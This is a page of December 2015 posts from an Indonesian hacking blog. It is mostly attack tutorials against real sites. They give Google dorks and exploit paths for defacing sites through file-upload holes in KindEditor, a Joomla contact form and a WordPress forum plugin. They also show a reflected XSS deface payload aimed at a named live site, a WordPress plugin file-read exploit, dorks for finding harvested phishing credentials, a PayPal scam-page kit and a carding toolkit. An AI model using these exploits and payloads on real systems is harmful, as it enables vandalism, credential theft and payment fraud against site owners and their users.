Skip to main content

Posts

Showing posts from December, 2015

Cara Deface Website Dengan Teknik Web KindEditor

Malem hari ini saya akan share tutorial  Cara Deface Website Dengan Teknik Web KindEditor . Bagi yang suka maen empes-empesan, Ane punya tutorial deface yang ngga terlalu sulit nih, anak SD juga kayanya bisa wkwk :p Ok, Langsung aja kita mulai defacenya ^^ Masukan Dorknya ke kotak pencarian Google : inurl:examples/uploadbutton.html inurl:kindeditor Exploit : http:// www.contohtarget.com /path/kindeditor/examples/uploadbutton.html 1. Kalo web target udah dapet, kita klik upload, 2. Kemudian pilih HTML defecan agan. Contoh disini kita menggunakan HTML ane... Cireboncyber4rt.html 3.  Nanti akan keluar URL hasil upload-an HTML kita... copas link tersebut dan letakkan diakhir URL. 4. Kemudian kalo sudah, tekan Enter. 5. Taraaa... :D Hasilnya : www.daitianyi.net www.staic.qefeng.com Gimana, mudahkan? hehehe... Bagi agan-agan yang masih bingung, silahkan bisa pakai demo upload buttonnya yang sudah saya dapatkan dibawah ini : Upload Button Example Semoga tutorial diatas tentang Ca...

Cara Mengetahui Hasil Phising Orang Lain

Hy, Sobat Blogger semua, Bertemu lagi dengan saya admin yg Ganteng ini :D oke dah, hari ini kita bahas tentang cara mengetahui pass. dan fb orang laen lewat program phising? * phising? apaan tuh? phising itu'kan sesuatu hal yg bikin suasana jadi angker apabila kita menciumnya? dan tempatnya di WC umum byasanya wk !! bukan itu yang saya maksud, hm, dilain waktu aja dah saya jelasiin tentang apa itu phising, dan apa kegunaannya. bagi agan2 yang penting'kan agan taw pass & email org laen, lalu bilang sama temen agan kalo agan habis nge-hack fb orang, wuish, wkwk. jangan gitu napa gan, bo'ong itu dosa. hehe oke, senjata yang agan perlukan hanyalah GOOGLE dan yang pasti dibantu dengan INTERNET. cara 1 : copy pastekan salah satu dork dibawah ini lewat google Dork: intext:charset_test= email= default_persistent= inurl:”passes” OR inurl:”passwords” OR inurl:”credentials” -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR ...

Download Scampage Paypal 2015

Nah Kali Ini Saya Ingin Berbagi Paypal Scam Page 2015 Tanpa Basa Basi Yuk Langsung Di Download Di Bawah Ini ;)  Download Here Nah , kalau cara gunakan-nya cukup mudah , tinggal kalian ganti file yg bernama ____YOURMAIL___ kalian ganti/edit dengan email kalian...Simple Kan ? Jika Masih Bingung Kalian Bisa Baca Di Dalam File yg Bernama  " read.txt " itu ada caranya juga , oke cukup sampai disini dulu ya ,Terima Kasih

Joomla Sexy contact form Arbitrary File Upload Vulnerability

Google Dork: "/components/com_sexycontactform/" site:gr Google Dork: "Powered by sexycontact" site:gr Google Dork: inurl:"sexy-contact-form" site:gr Exploit : components/com_sexycontactform/fileupload/index.php Shell Access : http://www.[target].com/components/com_sexycontactform/fileupload/files/ shell .php Source code CSRF : http://pastebin.com/fwRYQuGG

WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read

WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read # Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce" # Date: 10/06/2015 # Exploit Author: Kuroi'SH # Software Link: https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/ # Version: <=1.3 # Tested on: Linux Description: proxy.php's code:   <?php $file = file_get_contents($_GET['requrl']); $left=strpos($file,'<div id=currency_converter_result>'); $right=strlen($file)-strpos($file,'<input type=hidden name=meta'); $snip= substr($file,$left,$right); echo $snip; ?> Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to read any local file which is not executed in the server. Example: http://localhost/wp-content/plugins/paypal-currency-converter-bas...

Anonymous Proxy List - 29 Dec 2015

Anonymous Proxy List - 29 Dec 2015 Proxy List: 31.173.74.73:8080 186.88.123.134:8080 190.64.18.184:80 121.120.80.215:3128 194.126.37.94:8080 70.43.70.181:80 186.88.247.47:8080 82.198.197.62:80 58.248.137.228:80 186.227.56.158:80 159.226.40.218:10001 186.92.183.242:8080 190.73.233.107:8080 181.112.228.71:80 37.187.169.135:80 194.126.37.93:8080 213.24.60.52:8080 81.94.162.140:8080 119.81.226.186:8000 198.169.246.30:80 101.226.249.237:80 80.203.214.156:80 112.53.81.186:8081 101.99.18.234:8080 111.14.40.148:81 198.2.202.56:8090 209.188.21.202:3128 124.251.62.246:80 101.99.18.238:8080 203.100.7.110:8080 27.145.102.110:8888 84.241.174.88:80 80.203.214.156:8080 124.30.87.233:80 117.240.187.35:3128 121.14.9.76:80 115.28.173.134:8888 186.90.69.61:8080 111.14.40.147:8081 112.53.81.186:80 101.231.48.200:3128 111.14.40.146:8081 211.141.64.50:80 111.14.40.149:8081 111.14.40.148:8081 123.30.191.141:80 190.221.23.158:80 177.87.241.226:8080 182.23.1.150:80 111.14.40.148:80 118.189.13.178:8080 177.87...

Cara Carding Dan Scaming Lengkap 2016 Update

CARDING DENGAN HAVIJ(DuMP) 1.Alat Dan Bahan Berikut Alat-Alat Carding Mass... Ada Juga Tutorialnya Bentuk Pdf... Di Download Aja Ea... :D:D:D ALat-ALat Carding: 1.Tutorial Carding Disini 2.Havij Portable Disini 3.Simple Scan Dork Disini 4.Grenox Dork Scanner Disini 5.SQLI-DB Disini 6. Dork 1 Klik Disini Dork 2 Disini Dork 3 Disini Dork 4 Disini 7.Methode Order Western Union Disini 8.Methode All Site Disini 9.SQL MAP Disini 10.Phyton Untuk Support SQL MAP Disini Untuk Mencari CC/PP Gunakan Salah Satu Tools... Pilih Diantara Tools yang mungkin anda suka atau anda sudah pahami cara menggunakannya... Pilih Tool Antara Havij,SQL MAP,Atau SQL Dumper... Untuk Mencari Web vuln Pake tools diantara SQLi-DB atau Gr3nox Dork Scanner.. Sebelumnnya Saya Sudah memposting cara menggunakan SQLi-DB.. Untuk DOrk Saya Sudah Menyiapkan Bayak Diatas Dan Anda Tinggal Download Dan Langsung Praktekkan.. Jika Anda Ingin Mencheck CC/PP anda Yang Sudah Anda Dapat Dari Hasil Carding Anda Bisa Menchecknya Di Sit...

Cara Deface Website Menggunakan Teknik XSS Vulnerability

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini ! 1). Pertama, Masukan Dorknya : inurl:"/showcatrows.php?CategoryID=" 2) . Kalo sudah, Pilih salah satu web yang akan kita deface. Contoh : saya pakai web ini  http://www.examsolutions.co.uk/...?CategoryID=13 3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita. Contoh :  http://www.examsolutions.co.uk/...?CategoryID=13 "><marquee><h1>Hacked By YourNickname</h1></marquee> 4). Kemudian tekan Enter. 5). Selesai, Website sudah berhasil kita deface :D Triknya memang cukup simpel, dimana kita memanfaatkan celah ...

Download SQL Dumper V7

                                                               Download SQL Dumper V7 SQLi Dumper v.7 - Tool to find bugs errors or vulnerabilities in MySQL database Functions SQL Injection Operation System Function Dump Database Extract Database Schema Search Columns Name Read File (read only) Create File (read only) Brute Table & Column Download : Here After download, extract the rar file using WinRar or WinZIP. No Registration Required.

Download Havij 1.16 Portable

                                                 Download Havij 1.16 Portable Yah Kali Ini Saya Akan Share Tool Havij 1.16 Portable Tools Ini Biasa Nya Di Guna Kan Buat Carding,Deface DLL Yah Langsung Aja Deh Ke TKP :D Link Download :  Here Yg Suka Carding Nih Saya Share Dork Fresh Nya : Di Sini Terimakasih Sudah Berkunjung Di BLog Saya :)

Rurouni Kenshin: The Legend Ends

Rurouni Kenshin Kyoto Inferno | Live Action | English Sub

Resident Evil 2- Apocalypse

Resident Evil 1 Full Movie

Resident Evil Afterlife 2010 || Full Action Movies Full English

Resident Evil 4 Full Movie

Film Who Am i - No System Is Safe

Cara Membuat Config OpenVPN Sendiri di Android + Full Tutorial

Cara Membuat Config OpenVPN Sendiri di Android + Full Tutorial  - Pada kesempatan kali ini ane mau berbagi khusunya bagi pecinta gretonganz, yaitu "Membuat Configurasi OVPN di Andro" . OVPN Android Tentunya dg ini ente bisa menikmati internet gratis 0 pulsa 0 kuota (0p0k), silahkan ente praktekin sendiri. Sebelumnya download terlebih dahulu aplikasi OVPN di bawah ini. Download OVPN For Android : Selanjutnya mari ikuti tutorial ala Saya di bawah ini :  1.) Daftar terlebih dahulu Di Sini (Klik "Sign Up" paling bawah lalu konfirmasikan via e-mail) 2.) Jika sudah pilih "Subdomain" paling kiri dan klik "add domain" . (jgn ditutup dulu) 3.) Siapkan "Config OVPN TCP 443" yang masih fresh.  (bisa cari di Vpnbook , VpnGate , FlinchVpn , atau TunVpn ) 4.) Cari dan Catat IP Address dan download OVPN nya (seperti gambar di bawah) klik gambar untuk memperbesar 5.) Copy "IP Addressnya" tadi (seperti gambar di bawah) klik gambar untuk me...

Info Proxy & Port Default ALL Operator

Info Proxy & Port Default ALL Operator - Pada kesempatan kali ini Saya mau berbagi info sesuai judul di atas. Biasanya jika kita menggunakan sc (kartu) untuk berinternetan maka pasti ada default proxy port dari operator masing-masing. Contohnya TSEL default proxy portnya adalah 10.1.89.13:8000. Langsung saja berikut jika ente belum tau ; XL proxy = 202.152.240.50 port = 8080 ISAT proxy = 10.19.19.19 port = 8080 SMART proxy = 10.17.27.250 port = 8080 THREE proxy = 10.4.0.10 port = 3128 AXIS Proxy = 10.8.3.8 Port = 8080 TSEL proxy = 10.1.89.130 proxy = 8000 Sekian.. Demikian Info Proxy & Port Default ALL Operator Sumber Dari: http://sabadisayapku.blogspot.co.id/2015/09/info-proxy-port-default-all-operator.html#ixzz3vsPaJrr0

Cara Internet Gratis SSH di Android Dengan Eproxy & OVPN

Cara Internet Gratis SSH di Android Dengan Eproxy & OVPN Cara Internet Gratis SSH di Android Dengan Eproxy & OVPN - Pada kesempatan kali ini ane mau berbagi buat para pengguna gretongerz khususnya android..  SSH For Android Untuk berinternetan gratis di andro ente perlu punya apk. di bawah ini : Eproxy : Download Here OVPN For Android : Download Here dan pastikan ente sudah punya confignya. (baik config Eproxy maupun OVPN) Tutorial Penggunaan :  Setting Eproxy 1.) Pertama tentunya setelah di download install terlebih dahulu kedua aplikasi di atas. 2.) Buka "Eproxy" dan "Load Config" - "Open Confignya" (jika sudah punya) Apabila belum punya maka bisa buat "New Config" . Untuk caranya bisa kita bahas lain kali aja.. 3.) Jika sudah, Tinggal Klik "Start" Sampai disini kita sudah selesai setting untuk Eproxy nya. Tinggal kita sett pada OVPN. Setting OVPN 1.) Setelah di install buka "OVPN" pencet tombol plus (+) dan kli...

Cara Membuat Config Eproxy Sendiri di Android

Cara Membuat Config Eproxy Sendiri di Android - Kali ini Saya mau share Cara Membuat Config Eproxy Eproxy Cocok buat yg mau internetet gratis Di android, Sebelumnya download terlebih dahulu aplikasi Eproxy di bawah ini. Download Eproxy For Android : Selanjutnya mari simak kodenya di bawah ini :  Kira2 rinciannya seperti ini Method Back Netdata (split uncheck) : HEAD http://domain.com/ HTTP/1.1\r Host: domain.com \r Connection: keep-alive\r[netData]\r\r\n ket : Host silahkan diisi dg bug yg masih work (sesuai sc) [netData] = request [netData] = permintaan Example :  [netData]\r [HEAD] [http://rogerz404.blogspot.com] HTTP/1.1\r Connection: Keep-Alive\r Host: rogerz404.blogspot.com\r \r\n Tutorial Selanjut Nya Bisa Anda Lihat : Disini Setelah jadi confignya kita jalankan , untuk caranya bisa menuju Disini Sumber : Here

Tutorial Deface Wp Plugins Simple-Forum

Halloo met pagii fans, Nuenomaru disini .-. tadinya inih artikel mau gua post tadi malem, tapi kepikiran aja, sengaja post tanggal 31 biar jadi postingan penutup akhir tahun 2015. ciiiee,, nanti malem dah tahun baru aja :'D ,, awkakwka gimana ?? masih sendiri lo mblo o.O ? awkwakawk.. *dah cukup ahk basa basinya awkakwka Kali ini Nue akan Share Tutorial Deface Wp Plugins Simple-Forum , yupz salah satu Bug pada plugins di CMS Wordpress. etthoo,,  ini exploit gak begitu baru  loh ..  *tapi lagi ngetren ajah wkwk hahaha iseng2 aja share kali aja masih  crotz *yang dah expert minggir dlu beb ;* Play with Me Baby ;* Dork     : inurl:/wp-content/plugins/simple-forum Exploit : /wp-content/plugins/simple-forum /resources/jscript/ajaxupload/sf-uploader.php Pertama sobat cari dah targetnya dulu di google dengan memanfaatkan dork diatas, dan kalo bisa dork tersebut dikembangkan lagi yah, biar bisa nemu target yang Vuln and Verawan.  Lalu pilih web target an...